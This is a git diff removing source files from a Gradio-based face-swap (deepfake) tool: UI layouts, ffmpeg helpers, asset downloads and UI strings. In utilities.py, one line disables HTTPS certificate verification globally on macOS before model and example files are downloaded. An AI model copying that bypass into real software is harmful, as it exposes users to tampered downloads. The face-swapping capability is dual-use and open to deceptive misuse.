+ ui_layout) - for method_name in UI_LAYOUT_METHODS: - if not hasattr(ui_layout_module, method_name): - raise NotImplementedError - except ModuleNotFoundError: - sys.exit(wording.get('ui_layout_not_loaded').format(ui_layout = ui_layout)) - except NotImplementedError: - sys.exit(wording.get('ui_layout_not_implemented').format(ui_layout = ui_layout)) - return ui_layout_module - - -def get_theme() -> gradio.Theme: - return gradio.themes.Soft( - primary_hue = gradio.themes.colors.red, - secondary_hue = gradio.themes.colors.gray, - font = gradio.themes.GoogleFont('Inter') - ).set( - background_fill_primary = '*neutral_50', - block_label_text_size = '*text_sm', - block_title_text_size = '*text_sm' - ) - - -def get_component(name: ComponentName) -> Optional[Component]: - if name in COMPONENTS: - return COMPONENTS[name] - return None - - -def register_component(name: ComponentName, component: Component) -> None: - COMPONENTS[name] = component - - -def normalize_frame(frame : Frame) -> Frame: - return cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) diff --git a/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc b/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc deleted file mode 100644 index 89ffca297f794b12dd76d9df628cfb2e9d0e2730..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/layouts/benchmark.py b/DeepFakeAI/uis/layouts/benchmark.py deleted file mode 100644 index f58e47a7a0dc5b681fa78a0276df1b482c8c532d..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/layouts/benchmark.py +++ /dev/null @@ -1,37 +0,0 @@ -import gradio - -from DeepFakeAI.uis.components import about, processors, execution, benchmark -from DeepFakeAI.utilities import conditional_download - - -def pre_check() -> bool: - conditional_download('.assets/examples', - [ - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/source.jpg', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-240p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-360p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-540p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-720p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1080p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1440p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-2160p.mp4' - ]) - return True - - -def render() -> gradio.Blocks: - with gradio.Blocks() as layout: - with gradio.Row(): - with gradio.Column(scale = 2): - about.render() - processors.render() - execution.render() - with gradio.Column(scale= 5): - benchmark.render() - return layout - - -def listen() -> None: - processors.listen() - execution.listen() - benchmark.listen() diff --git a/DeepFakeAI/uis/layouts/default.py b/DeepFakeAI/uis/layouts/default.py deleted file mode 100644 index 250e56c7f68f375dd8eb9dac69320aeb1723cce1..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/layouts/default.py +++ /dev/null @@ -1,44 +0,0 @@ -import gradio - -from DeepFakeAI.uis.components import about, processors, execution, temp_frame, settings, source, target, preview, trim_frame, face_analyser, face_selector, output_settings, output - - -def pre_check() -> bool: - return True - - -def render() -> 
gradio.Blocks: - with gradio.Blocks() as layout: - with gradio.Row(): - with gradio.Column(scale = 2): - about.render() - processors.render() - execution.render() - temp_frame.render() - settings.render() - with gradio.Column(scale = 2): - source.render() - target.render() - output_settings.render() - output.render() - with gradio.Column(scale = 3): - #preview.render() - trim_frame.render() - face_selector.render() - face_analyser.render() - return layout - - -def listen() -> None: - processors.listen() - execution.listen() - settings.listen() - temp_frame.listen() - source.listen() - target.listen() - #preview.listen() - trim_frame.listen() - face_selector.listen() - face_analyser.listen() - output_settings.listen() - output.listen() diff --git a/DeepFakeAI/uis/typing.py b/DeepFakeAI/uis/typing.py deleted file mode 100644 index 4abe384f07c4b90504e47291674905f85a5b8f52..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/typing.py +++ /dev/null @@ -1,18 +0,0 @@ -from typing import Literal, Dict, Any, Union -import gradio - -Component = Union[gradio.File, gradio.Image, gradio.Video, gradio.Slider] -ComponentName = Literal\ -[ - 'source_file', - 'target_file', - 'preview_frame_slider', - 'face_recognition_dropdown', - 'reference_face_position_gallery', - 'reference_face_distance_slider', - 'face_analyser_direction_dropdown', - 'face_analyser_age_dropdown', - 'face_analyser_gender_dropdown', - 'frame_processors_checkbox_group' -] -Update = Dict[Any, Any] diff --git a/DeepFakeAI/utilities.py b/DeepFakeAI/utilities.py deleted file mode 100644 index dd33cf157f684dc1bad324bca4d9326b8e3f82f2..0000000000000000000000000000000000000000 --- a/DeepFakeAI/utilities.py +++ /dev/null @@ -1,190 +0,0 @@ -import glob -import mimetypes -import os -import platform -import shutil -import ssl -import subprocess -import tempfile -import urllib -from pathlib import Path -from typing import List, Optional - -import onnxruntime -from tqdm import tqdm - -import DeepFakeAI.globals -from DeepFakeAI import wording - -TEMP_DIRECTORY_PATH = os.path.join(tempfile.gettempdir(), 'DeepFakeAI') -TEMP_OUTPUT_NAME = 'temp.mp4' - -# monkey patch ssl -if platform.system().lower() == 'darwin': - ssl._create_default_https_context = ssl._create_unverified_context - - -def run_ffmpeg(args : List[str]) -> bool: - commands = [ 'ffmpeg', '-hide_banner', '-loglevel', 'error' ] - commands.extend(args) - try: - subprocess.check_output(commands, stderr = subprocess.STDOUT) - return True - except subprocess.CalledProcessError: - return False - - -def detect_fps(target_path : str) -> Optional[float]: - commands = [ 'ffprobe', '-v', 'error', '-select_streams', 'v:0', '-show_entries', 'stream=r_frame_rate', '-of', 'default=noprint_wrappers = 1:nokey = 1', target_path ] - output = subprocess.check_output(commands).decode().strip().split('/') - try: - numerator, denominator = map(int, output) - return numerator / denominator - except (ValueError, ZeroDivisionError): - return None - - -def extract_frames(target_path : str, fps : float) -> bool: - temp_directory_path = get_temp_directory_path(target_path) - temp_frame_quality = round(31 - (DeepFakeAI.globals.temp_frame_quality * 0.31)) - trim_frame_start = DeepFakeAI.globals.trim_frame_start - trim_frame_end = DeepFakeAI.globals.trim_frame_end - commands = [ '-hwaccel', 'auto', '-i', target_path, '-q:v', str(temp_frame_quality), '-pix_fmt', 'rgb24', ] - if trim_frame_start is not None and trim_frame_end is not None: - commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) +
':end_frame=' + str(trim_frame_end) + ',fps=' + str(fps) ]) - elif trim_frame_start is not None: - commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ',fps=' + str(fps) ]) - elif trim_frame_end is not None: - commands.extend([ '-vf', 'trim=end_frame=' + str(trim_frame_end) + ',fps=' + str(fps) ]) - else: - commands.extend([ '-vf', 'fps=' + str(fps) ]) - commands.extend([os.path.join(temp_directory_path, '%04d.' + DeepFakeAI.globals.temp_frame_format)]) - return run_ffmpeg(commands) - - -def create_video(target_path : str, fps : float) -> bool: - temp_output_path = get_temp_output_path(target_path) - temp_directory_path = get_temp_directory_path(target_path) - output_video_quality = round(51 - (DeepFakeAI.globals.output_video_quality * 0.5)) - commands = [ '-hwaccel', 'auto', '-r', str(fps), '-i', os.path.join(temp_directory_path, '%04d.' + DeepFakeAI.globals.temp_frame_format), '-c:v', DeepFakeAI.globals.output_video_encoder ] - if DeepFakeAI.globals.output_video_encoder in [ 'libx264', 'libx265', 'libvpx' ]: - commands.extend([ '-crf', str(output_video_quality) ]) - if DeepFakeAI.globals.output_video_encoder in [ 'h264_nvenc', 'hevc_nvenc' ]: - commands.extend([ '-cq', str(output_video_quality) ]) - commands.extend([ '-pix_fmt', 'yuv420p', '-vf', 'colorspace=bt709:iall=bt601-6-625', '-y', temp_output_path ]) - return run_ffmpeg(commands) - - -def restore_audio(target_path : str, output_path : str) -> None: - fps = detect_fps(target_path) - trim_frame_start = DeepFakeAI.globals.trim_frame_start - trim_frame_end = DeepFakeAI.globals.trim_frame_end - temp_output_path = get_temp_output_path(target_path) - commands = [ '-hwaccel', 'auto', '-i', temp_output_path, '-i', target_path ] - if trim_frame_start is None and trim_frame_end is None: - commands.extend([ '-c:a', 'copy' ]) - else: - if trim_frame_start is not None: - start_time = trim_frame_start / fps - commands.extend([ '-ss', str(start_time) ]) - else: - commands.extend([ '-ss', '0' ]) - if trim_frame_end is not None: - end_time = trim_frame_end / fps - commands.extend([ '-to', str(end_time) ]) - commands.extend([ '-c:a', 'aac' ]) - commands.extend([ '-map', '0:v:0', '-map', '1:a:0', '-y', output_path ]) - done = run_ffmpeg(commands) - if not done: - move_temp(target_path, output_path) - - -def get_temp_frame_paths(target_path : str) -> List[str]: - temp_directory_path = get_temp_directory_path(target_path) - return glob.glob((os.path.join(glob.escape(temp_directory_path), '*.' 
+ DeepFakeAI.globals.temp_frame_format))) - - -def get_temp_directory_path(target_path : str) -> str: - target_name, _ = os.path.splitext(os.path.basename(target_path)) - return os.path.join(TEMP_DIRECTORY_PATH, target_name) - - -def get_temp_output_path(target_path : str) -> str: - temp_directory_path = get_temp_directory_path(target_path) - return os.path.join(temp_directory_path, TEMP_OUTPUT_NAME) - - -def normalize_output_path(source_path : str, target_path : str, output_path : str) -> Optional[str]: - if source_path and target_path and output_path: - source_name, _ = os.path.splitext(os.path.basename(source_path)) - target_name, target_extension = os.path.splitext(os.path.basename(target_path)) - if os.path.isdir(output_path): - return os.path.join(output_path, source_name + '-' + target_name + target_extension) - return output_path - - -def create_temp(target_path : str) -> None: - temp_directory_path = get_temp_directory_path(target_path) - Path(temp_directory_path).mkdir(parents = True, exist_ok = True) - - -def move_temp(target_path : str, output_path : str) -> None: - temp_output_path = get_temp_output_path(target_path) - if os.path.isfile(temp_output_path): - if os.path.isfile(output_path): - os.remove(output_path) - shutil.move(temp_output_path, output_path) - - -def clear_temp(target_path : str) -> None: - temp_directory_path = get_temp_directory_path(target_path) - parent_directory_path = os.path.dirname(temp_directory_path) - if not DeepFakeAI.globals.keep_temp and os.path.isdir(temp_directory_path): - shutil.rmtree(temp_directory_path) - if os.path.exists(parent_directory_path) and not os.listdir(parent_directory_path): - os.rmdir(parent_directory_path) - - -def is_image(image_path : str) -> bool: - if image_path and os.path.isfile(image_path): - mimetype, _ = mimetypes.guess_type(image_path) - return bool(mimetype and mimetype.startswith('image/')) - return False - - -def is_video(video_path : str) -> bool: - if video_path and os.path.isfile(video_path): - mimetype, _ = mimetypes.guess_type(video_path) - return bool(mimetype and mimetype.startswith('video/')) - return False - - -def conditional_download(download_directory_path : str, urls : List[str]) -> None: - if not os.path.exists(download_directory_path): - os.makedirs(download_directory_path) - for url in urls: - download_file_path = os.path.join(download_directory_path, os.path.basename(url)) - if not os.path.exists(download_file_path): - request = urllib.request.urlopen(url) # type: ignore[attr-defined] - total = int(request.headers.get('Content-Length', 0)) - with tqdm(total = total, desc = wording.get('downloading'), unit = 'B', unit_scale = True, unit_divisor = 1024) as progress: - urllib.request.urlretrieve(url, download_file_path, reporthook = lambda count, block_size, total_size: progress.update(block_size)) # type: ignore[attr-defined] - - -def resolve_relative_path(path : str) -> str: - return os.path.abspath(os.path.join(os.path.dirname(__file__), path)) - - -def list_module_names(path : str) -> Optional[List[str]]: - if os.path.exists(path): - files = os.listdir(path) - return [Path(file).stem for file in files if not Path(file).stem.startswith('__')] - return None - - -def encode_execution_providers(execution_providers : List[str]) -> List[str]: - return [execution_provider.replace('ExecutionProvider', '').lower() for execution_provider in execution_providers] - - -def decode_execution_providers(execution_providers : List[str]) -> List[str]: - return [provider for provider, encoded_execution_provider in 
zip(onnxruntime.get_available_providers(), encode_execution_providers(onnxruntime.get_available_providers())) if any(execution_provider in encoded_execution_provider for execution_provider in execution_providers)] diff --git a/DeepFakeAI/wording.py b/DeepFakeAI/wording.py deleted file mode 100644 index 1d70363ea7546eeb3b3ec224eb04848db727718e..0000000000000000000000000000000000000000 --- a/DeepFakeAI/wording.py +++ /dev/null @@ -1,88 +0,0 @@ -WORDING =\ -{ - 'python_not_supported': 'Python version is not supported, upgrade to {version} or higher', - 'ffmpeg_not_installed': 'FFmpeg is not installed', - 'source_help': 'select a source image', - 'target_help': 'select a target image or video', - 'output_help': 'specify the output file or directory', - 'frame_processors_help': 'choose from the available frame processors (choices: {choices}, ...)', - 'ui_layouts_help': 'choose from the available ui layouts (choices: {choices}, ...)', - 'keep_fps_help': 'preserve the frames per second (fps) of the target', - 'keep_temp_help': 'retain temporary frames after processing', - 'skip_audio_help': 'omit audio from the target', - 'face_recognition_help': 'specify the method for face recognition', - 'face_analyser_direction_help': 'specify the direction used for face analysis', - 'face_analyser_age_help': 'specify the age used for face analysis', - 'face_analyser_gender_help': 'specify the gender used for face analysis', - 'reference_face_position_help': 'specify the position of the reference face', - 'reference_face_distance_help': 'specify the distance between the reference face and the target face', - 'reference_frame_number_help': 'specify the number of the reference frame', - 'trim_frame_start_help': 'specify the start frame for extraction', - 'trim_frame_end_help': 'specify the end frame for extraction', - 'temp_frame_format_help': 'specify the image format used for frame extraction', - 'temp_frame_quality_help': 'specify the image quality used for frame extraction', - 'output_video_encoder_help': 'specify the encoder used for the output video', - 'output_video_quality_help': 'specify the quality used for the output video', - 'max_memory_help': 'specify the maximum amount of ram to be used (in gb)', - 'execution_providers_help': 'choose from the available execution providers (choices: {choices}, ...)', - 'execution_thread_count_help': 'specify the number of execution threads', - 'execution_queue_count_help': 'specify the number of execution queues', - 'creating_temp': 'Creating temporary resources', - 'extracting_frames_fps': 'Extracting frames with {fps} FPS', - 'processing': 'Processing', - 'downloading': 'Downloading', - 'temp_frames_not_found': 'Temporary frames not found', - 'creating_video_fps': 'Creating video with {fps} FPS', - 'creating_video_failed': 'Creating video failed', - 'skipping_audio': 'Skipping audio', - 'restoring_audio': 'Restoring audio', - 'clearing_temp': 'Clearing temporary resources', - 'processing_image_succeed': 'Processing to image succeeded', - 'processing_image_failed': 'Processing to image failed', - 'processing_video_succeed': 'Processing to video succeeded', - 'processing_video_failed': 'Processing to video failed', - 'select_image_source': 'Select an image for source path', - 'select_image_or_video_target': 'Select an image or video for target path', - 'no_source_face_detected': 'No source face detected', - 'frame_processor_not_loaded': 'Frame processor {frame_processor} could not be loaded', - 'frame_processor_not_implemented': 'Frame processor {frame_processor} not
implemented correctly', - 'ui_layout_not_loaded': 'UI layout {ui_layout} could not be loaded', - 'ui_layout_not_implemented': 'UI layout {ui_layout} not implemented correctly', - 'start_button_label': 'START', - 'clear_button_label': 'CLEAR', - 'benchmark_result_dataframe_label': 'BENCHMARK RESULT', - 'benchmark_cycles_slider_label': 'BENCHMARK CYCLES', - 'execution_providers_checkbox_group_label': 'EXECUTION PROVIDERS', - 'execution_thread_count_slider_label': 'EXECUTION THREAD COUNT', - 'execution_queue_count_slider_label': 'EXECUTION QUEUE COUNT', - 'face_analyser_direction_dropdown_label': 'FACE ANALYSER DIRECTION', - 'face_analyser_age_dropdown_label': 'FACE ANALYSER AGE', - 'face_analyser_gender_dropdown_label': 'FACE ANALYSER GENDER', - 'reference_face_gallery_label': 'REFERENCE FACE', - 'face_recognition_dropdown_label': 'FACE RECOGNITION', - 'reference_face_distance_slider_label': 'REFERENCE FACE DISTANCE', - 'output_image_or_video_label': 'OUTPUT', - 'output_video_encoder_dropdown_label': 'OUTPUT VIDEO ENCODER', - 'output_video_quality_slider_label': 'OUTPUT VIDEO QUALITY', - 'preview_image_label': 'PREVIEW', - 'preview_frame_slider_label': 'PREVIEW FRAME', - 'frame_processors_checkbox_group_label': 'FRAME PROCESSORS', - 'keep_fps_checkbox_label': 'KEEP FPS', - 'keep_temp_checkbox_label': 'KEEP TEMP', - 'skip_audio_checkbox_label': 'SKIP AUDIO', - 'temp_frame_format_dropdown_label': 'TEMP FRAME FORMAT', - 'temp_frame_quality_slider_label': 'TEMP FRAME QUALITY', - 'trim_frame_start_slider_label': 'TRIM FRAME START', - 'trim_frame_end_slider_label': 'TRIM FRAME END', - 'source_file_label': 'SOURCE', - 'target_file_label': 'TARGET', - 'point': '.', - 'comma': ',', - 'colon': ':', - 'question_mark': '?', - 'exclamation_mark': '!' -} - - -def get(key : str) -> str: - return WORDING[key]
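
The removed benchmark component reduces its timing loop to four numbers: it runs one warm-up cycle plus benchmark_cycles measured cycles, then reports the mean, fastest and slowest run alongside a relative FPS. A minimal sketch of that reduction, with a hypothetical run() stub standing in for conditional_process() and a fixed frame count standing in for get_video_frame_total():

import statistics
import time

def run() -> None:
    time.sleep(0.01)  # hypothetical stand-in for one full processing pass

def benchmark_stats(video_frame_total : int, benchmark_cycles : int) -> list:
    process_times = []
    total_fps = 0.0
    for i in range(benchmark_cycles + 1):  # one extra cycle up front as warm-up
        start_time = time.perf_counter()
        run()
        process_time = time.perf_counter() - start_time
        if i > 0:  # the warm-up cycle is discarded
            process_times.append(process_time)
            total_fps += video_frame_total / process_time
    return [
        round(statistics.mean(process_times), 2),  # average_run
        round(min(process_times), 2),              # fastest_run
        round(max(process_times), 2),              # slowest_run
        round(total_fps / benchmark_cycles, 2)     # relative_fps
    ]

print(benchmark_stats(270, 3))

Discarding the first cycle keeps model loading and other one-off warm-up costs out of the statistics.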
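
detect_fps in the removed utilities.py parses ffprobe's r_frame_rate, which is reported as a rational, so NTSC rates like 29.97 survive instead of being truncated to integers. The parsing step in isolation, with a hard-coded sample value in place of the real ffprobe call:

output = '30000/1001'.split('/')  # sample r_frame_rate value; the real code shells out to ffprobe
numerator, denominator = map(int, output)
fps = numerator / denominator
assert abs(fps - 29.97) < 0.001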
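
extract_frames and create_video map the 0-100 quality sliders onto ffmpeg's inverted scales, where lower is better: -q:v runs from 31 down to 0 and CRF from 51 down to 1. The arithmetic, lifted from the deleted code into standalone helpers (the function names here are illustrative):

def temp_frame_qscale(temp_frame_quality : int) -> int:
    # slider 0 -> 31 (worst JPEG qscale), slider 100 -> 0 (best)
    return round(31 - (temp_frame_quality * 0.31))

def output_video_crf(output_video_quality : int) -> int:
    # slider 0 -> 51 (worst CRF), slider 100 -> 1 (near lossless)
    return round(51 - (output_video_quality * 0.5))

assert temp_frame_qscale(80) == 6   # a quality of 80 becomes -q:v 6
assert output_video_crf(80) == 11   # and -crf 11 for libx264/libx265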
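
normalize_output_path is what lets the output argument accept either a file or a directory: a directory yields a generated '<source>-<target><extension>' file inside it, while a file path passes through unchanged. The function is self-contained enough to reproduce verbatim:

import os
from typing import Optional

def normalize_output_path(source_path : str, target_path : str, output_path : str) -> Optional[str]:
    if source_path and target_path and output_path:
        source_name, _ = os.path.splitext(os.path.basename(source_path))
        target_name, target_extension = os.path.splitext(os.path.basename(target_path))
        if os.path.isdir(output_path):
            return os.path.join(output_path, source_name + '-' + target_name + target_extension)
        return output_path
    return None

print(normalize_output_path('source.jpg', 'target.mp4', '/tmp'))
# -> '/tmp/source-target.mp4' when /tmp is a directory
print(normalize_output_path('source.jpg', 'target.mp4', 'result.mp4'))
# -> 'result.mp4'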
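
encode_execution_providers and decode_execution_providers translate between onnxruntime's class-style provider names and the short flags accepted on the command line. A round trip under the assumption that only CUDA and CPU are available; unlike the original, this sketch takes the available list as a parameter instead of calling onnxruntime.get_available_providers():

from typing import List

def encode_execution_providers(execution_providers : List[str]) -> List[str]:
    return [ provider.replace('ExecutionProvider', '').lower() for provider in execution_providers ]

def decode_execution_providers(requested : List[str], available : List[str]) -> List[str]:
    # keep every available provider whose encoded name contains a requested flag
    return [
        provider
        for provider, encoded in zip(available, encode_execution_providers(available))
        if any(flag in encoded for flag in requested)
    ]

available = [ 'CUDAExecutionProvider', 'CPUExecutionProvider' ]  # assumed for the example
assert encode_execution_providers(available) == [ 'cuda', 'cpu' ]
assert decode_execution_providers([ 'cpu' ], available) == [ 'CPUExecutionProvider' ]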